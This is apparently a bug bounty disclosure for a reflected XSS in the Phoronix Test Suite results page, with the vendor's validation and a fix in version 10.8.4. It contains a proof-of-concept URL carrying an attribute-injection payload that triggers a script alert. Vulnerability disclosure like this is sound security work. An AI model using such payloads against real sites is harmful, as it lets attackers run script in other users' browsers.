Reflected XSS in Results tab in phoronix-test-suite/phoronix-test-suite


Reported on

Jun 8th 2022


Please enter a description of the vulnerability.

Proof of Concept

1. Install a local instance of phoronix
2. Run a benchmark
3. When the test is complete, for example the result id is xxxxx
4. Acess http://localhost/?result/xxxxx&ppd_U1lTVEVN=abc"onfocus="alert(origin)"+autofocus="abc&oss=&submit=Refresh+Results
You will see alert box


This vulnerability is capable of Reflected XSS

We are processing your report and will contact the phoronix-test-suite team within 24 hours. a year ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back a year ago
phoronix-test-suite/phoronix-test-suite maintainer modified the Severity from High to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a year ago
Andy has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in 10.8.4 with commit bce1fb a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation